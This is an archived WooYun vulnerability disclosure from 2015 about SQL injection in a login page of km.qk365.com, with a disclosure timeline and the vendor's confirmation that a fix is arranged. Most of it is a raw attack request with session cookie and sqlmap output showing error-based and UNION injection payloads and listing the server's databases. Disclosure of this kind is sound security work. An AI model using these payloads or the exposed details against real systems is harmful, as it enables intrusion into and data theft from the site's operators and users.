乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-06: 细节已通知厂商并且等待厂商处理中 2015-11-06: 厂商已经确认,细节仅向厂商公开 2015-11-16: 细节向核心白帽子及相关领域专家公开 2015-11-26: 细节向普通白帽子公开 2015-12-06: 细节向实习白帽子公开 2015-12-21: 细节向公众公开
2333
POST /Tentct/Login.aspx HTTP/1.1Host: km.qk365.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://km.qk365.com/Tentct/Login.aspxCookie: Hm_lvt_53c8bf761df44282a0cf7d4949581592=1446710154; Hm_lpvt_53c8bf761df44282a0cf7d4949581592=1446710163; _ga=GA1.2.837828670.1446710155; LXB_REFER=www.wooyun.org; ASP.NET_SessionId=xz1yzy55pt5wpqizuh5k2k55X-Forwarded-For: 8.8.8.8'Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 319__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b%2BrTX22oGpB3az%2BQ5MK&txt_Code=admin&txt_Password=123456&imageField.x=0&imageField.y=0&__EVENTVALIDATION=%2FwEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD%2F6wTuGPHEaKThJjkc8fmNFk3e%2BR
txt_Code可注入
POST parameter 'txt_Code' is vulnerable. Do you want to keep testing the others(if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 42 HTTP(s) requests:---Parameter: txt_Code (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b+rTX22oGpB3az+Q5MK&txt_Code=admin' AND 3112=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3112=3112) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(118)+CHAR(113))) AND 'yCuW'='yCuW&txt_Password=123456&imageField.x=0&imageField.y=0&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e+R Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b+rTX22oGpB3az+Q5MK&txt_Code=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(82)+CHAR(80)+CHAR(67)+CHAR(104)+CHAR(81)+CHAR(89)+CHAR(110)+CHAR(81)+CHAR(108)+CHAR(109)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &txt_Password=123456&imageField.x=0&imageField.y=0&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e+R---[18:16:02] [INFO] testing Microsoft SQL Server[18:16:03] [INFO] confirming Microsoft SQL Server[18:16:04] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[18:16:04] [INFO] fetching database names[18:16:04] [INFO] the SQL query used returns 28 entries[18:16:04] [INFO] retrieved: 20141231[18:16:05] [INFO] retrieved: master[18:16:05] [INFO] retrieved: model[18:16:05] [INFO] retrieved: msdb[18:16:06] [INFO] retrieved: new_0430[18:16:06] [INFO] retrieved: new_HouseRent_20141130[18:16:06] [INFO] retrieved: new_HouseRent_20141130[18:16:07] [INFO] retrieved: new_HouseRent_20141201[18:16:07] [INFO] retrieved: new_HouseRent_20141228[18:16:07] [INFO] retrieved: new_HouseRent_20150119[18:16:07] [INFO] retrieved: new_HouseRent_20150120[18:16:08] [INFO] retrieved: new_HouseRent_20150205[18:16:08] [INFO] retrieved: new_HouseRent_20150301[18:16:08] [INFO] retrieved: new_HouseRent_20150306[18:16:10] [INFO] retrieved: new_HouseRent_20150325[18:16:11] [INFO] retrieved: new_HouseRent_20150401[18:16:11] [INFO] retrieved: new_HouseRent_20150405[18:16:11] [INFO] retrieved: new_HouseRent_20150501_0[18:16:11] [INFO] retrieved: new_HouseRent_20150605[18:16:11] [INFO] retrieved: new_HouseRent_20150731[18:16:12] [INFO] retrieved: new_HouseRent_20150930[18:16:12] [INFO] retrieved: ReportServer[18:16:12] [INFO] retrieved: ReportServerTempDB[18:16:15] [INFO] retrieved: tempdb[18:16:16] [INFO] retrieved: tmp_1018[18:16:16] [INFO] retrieved: tmp_1019[18:16:16] [INFO] retrieved: tmp_1020[18:16:16] [INFO] retrieved: tmp_111available databases [27]:[*] 20141231[*] master[*] model[*] msdb[*] new_0430[*] new_HouseRent_20141130[*] new_HouseRent_20141201[*] new_HouseRent_20141228[*] new_HouseRent_20150119[*] new_HouseRent_20150120[*] new_HouseRent_20150205[*] new_HouseRent_20150301[*] new_HouseRent_20150306[*] new_HouseRent_20150325[*] new_HouseRent_20150401[*] new_HouseRent_20150405[*] new_HouseRent_20150501_0[*] new_HouseRent_20150605[*] new_HouseRent_20150731[*] new_HouseRent_20150930[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] tmp_1018[*] tmp_1019[*] tmp_1020[*] tmp_111[18:16:17] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 52 times[18:16:17] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\km.qk365.com'[*] shutting down at 18:16:17
危害等级:高
漏洞Rank:10
确认时间:2015-11-06 19:01
非常感谢,已经安排紧急修复
暂无